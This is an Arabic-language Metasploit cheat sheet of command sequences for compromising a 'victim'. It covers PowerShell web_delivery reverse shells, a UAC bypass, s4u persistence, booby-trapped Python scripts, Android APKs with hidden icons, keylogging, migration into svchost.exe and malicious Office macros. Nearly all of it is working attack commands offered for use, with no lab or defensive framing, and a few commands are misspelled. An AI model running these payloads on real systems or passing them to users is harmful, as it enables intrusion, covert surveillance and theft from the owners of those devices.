Metasploit
PlusX4______________________________________________________
أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery
+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
+) أوامر الأستغلال ~>
$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>
______________________________________________________
تخطي UAC باستغلال ثغرة ASK
+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives
_____________________________________________________
استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit
______________________________________________________
اختراق الأجهزة بإستخدام سكربت بلغة الباثيون
+) صنع السكربت الملغم ~>
$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
______________________________________________________
اختراق الاندرويد عن طريق بايلود apk ملغم
+) صنع بايلود ملغم ~>
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk
+) الأستغلال ~>
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon
______________________________________________________
التنصت على لوحة مفاتيح الضحية
+) أوامر الأستغلال ~>
$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit
_____________________________________________________
نقل عملية الاختراق داخل proceess عند قتل البايلود
+) أوامر الأستغلال ~>
$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
_____________________________________________________
تلغيم ملفات Microsoft Offic
+) أمر تلغيم ~>
$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
_____________________________________________________